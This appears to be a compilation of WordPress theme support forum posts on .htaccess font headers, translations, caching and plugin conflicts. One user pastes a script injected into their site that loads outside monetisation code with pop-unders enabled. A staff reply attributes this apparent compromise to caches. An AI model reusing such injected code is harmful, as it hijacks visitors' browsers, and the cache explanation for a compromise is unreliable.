Hello bformhals,

Sorry for this but please notice that I have inspected your website and I saw that you are using a lot of untested plugins which can interact with the theme core files and cause a lot of unknown issues, as you can see here -> https://www.screencast.com/t/AkqAHRkOMg6j sorry! Notice that the first steps for debugging WordPress are to disable all of the untested plugins to avoid all of the conflicting plugins. You should roll back to the default theme functionality, remove all of the untested plugins and all of the additional customization which can break the theme, clear all the caches, purge CDN files if you are using the CDN system and check the results. After this, if the problem is still there, please let us know.

Thanks for your understanding!

Thanks.

I tried to put code in htaccess:

<FilesMatch “\.(ttf|otf|eot|woff|woff2)$”>
<IfModule mod_headers.c>
Header set Access-Control-Allow-Origin “http://skin.cdn.com”
</IfModule>
</FilesMatch>

Did not work.

Tried another htaccess code…

<FilesMatch “\.(ttf|otf|eot|woff|woff2)$”>
<IfModule mod_headers.c>
Header set Access-Control-Allow-Origin “http://skin.cdn.com”
</IfModule>
</FilesMatch>

Internal Server Error

I also purged CDN. :/

Is there anything else i can try ?

I previewed and try options that are posted in link.. :/

Website is: tetoviran.si

Thanks.

Just cleared the entire site cache: page-cache, CDN cache, and object cache (and my browser cache for good measure) to no avail. Any ideas?

Hi Guys,

In the settings of the theme, I was in the Translations tab, then I chose French and click on Save. But the translations in French are not displayed.

I disable the CDN
I’ve emptied the CDN cache and Browser
I disable the editor

But it does not always work. I was seeing in the Translations folder of the theme but there were no FR files, is it possible to have them?

My sites keeps showing a popup to another site, when I investigate the code – it shows the following:

//
(function() {
var configuration = {
"token": "8f1bc5aa7e697f9829c057cfd305bd64",
"popUnder": {
"enabled": true
}
};
var script = document.createElement('script');
script.async = true;
script.src = '//cdn.shorte.st/link-converter.min.js';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
})();
//

I have also noticed other people with the same issue on the Newspaper theme:
https://stackoverflow.com/questions/44038908/how-to-determine-how-someone-is-hacking-my-wordpress-site

Here is a link to my site

Can you please advise how to fix this, I have removed all wordpress files, updated theme, removed and installed all plugins again, ran wordfence and anti-malware and its still there.

Hi Todd,

It seems to be a problem caused by your memory caches. Please try to remove all of the caches from your website, also, check the hosting provider and remove the server cache, purge all CDN files if you are using the CDN system and check the results. If the problem is still there, you should make a new clean install from scratch via FTP way with the latest theme version and check the results.

Hope this helps and let us know how it goes!

Thanks for the message!

Hello Tina,

The menu should open regardless of the images set as a background.
The most likely cause for this is a plugin conflict.
Please disable all plugins except the page builder, clear cache and reset cdn files if you use it. Please also check any custom code you might have added to the theme panel or the theme files. If you use a child theme, please switch to the main theme to make sure it does not affect the proper functionality of the theme.

Thank you!

Hello Ramon Davi,

Notice that problem with the close button does not come from our theme. It seems to be a CDN problem. Do you have purged all the CDN files and cleared all the caches? Also, I saw that you are not using the latest theme version. please update it via FTP and check the results.

Thanks for the message!

Hi,

I’ve recently purchased Newspaper theme for my blog http://www.1001tricks.com

But I’m facing an issue when I scanned using Wordfence to see if there is any security issue.

It’s reporting that some kind of malware has been found within the theme.

Check screenshot: https://scontent-sin6-1.xx.fbcdn.net/v/t34.0-12/20196987_833912646759350_791776505_n.png?oh=add55a74eea429702413b803422b7cad&oe=5970688B

Is there anything to be worried?

Hello Vaniquest,

I have checked your website and I saw that your style.css file is not loaded and that’s why you do not bring any style of your website, as you can see here -> https://www.screencast.com/t/eritonbD -> https://www.screencast.com/t/gAcqXv3iWHC sorry! I recommend you to make a full backup to your database and then, you should re-install the theme via FTP way because this is the surest method in this case. Also, if the problem is still there, you should contact your hosting provider, tell this issue because it could be possible to be a server problem and from various reasons the style.css file is not loaded on the server. Also, if you are using some untested plugins, you should remove all of them, leave just to active only the required plugins, clear all the caches, purge CDN files if you are using the CDN system and check the results.

Thanks for your understanding!

Hello,

This does not happen on our end: https://demo.tagdiv.com/newspaper/wordpress-news-magazine-charts-the-most-fashionable-new-york-couples-in-2016/

This could be a plugin conflict so please disable all plugins except the page builder, clear cache and reset cdn files if you use it. Please also check any custom code you might have added to the theme panel or the theme files. If you use a child theme, please switch to the main theme to make sure it does not affect the proper functionality of the theme.

Hello Daniela,

We have no reports of this issue for the moment. It must be something local affecting it.
Please check to see if the implementation is done correctly:

https://css-tricks.com/moving-to-https-on-wordpress/
https://yoast.com/dev-blog/move-website-https-ssl/

If everything is in order, try it without plugins as there could be a plugin conflict affecting it. Disable all plugins except the page builder, clear cache and reset CDN files if you use it. Please also check any custom code you might have added to the theme panel or the theme files. If you use a child theme, please switch to the main theme to make sure it does not affect the proper functioning of the theme.

Hello MayraR59,

First of all, ensure that you are using the latest theme version and use only the required plugins which come bundled with the theme core files. Check the system status parameters to be according to our documentation here -> https://forum.tagdiv.com/system-status-parameters-guide/ Also, if you are using a strong caching plugin, you should clear all of this memory, purge all CDN files and check the results.

If the get access token does not work on your site please uninstall and delete your current version of the social counter plugin and install this one:
http://cdn.tagdiv.com/wp-content/uploads/2017/03/td-social-counter.zip
Then please clear your browser cache before pressing the get access token. Here is an example on chrome: ctrl+shift+delete: https://www.screencast.com/t/afA9RzKuRsDv

Hello likocorp,

unfortunately, I do not exactly understand what you mean and what files you refer to, sorry! Most likely, all of these might appears from your untested plugins, if you are using something like this. Try to remove all of them and leave just to active only the plugins that come bundled with the theme core files and what the theme needs. Clear all the caches, purge CDN files and check the results.
If you need more assistance and if is not what you mean, please provide more details about your problem and exactly specify what kind of files you are referring to so I can try to provide a more accurate response.

Thanks for your understanding!
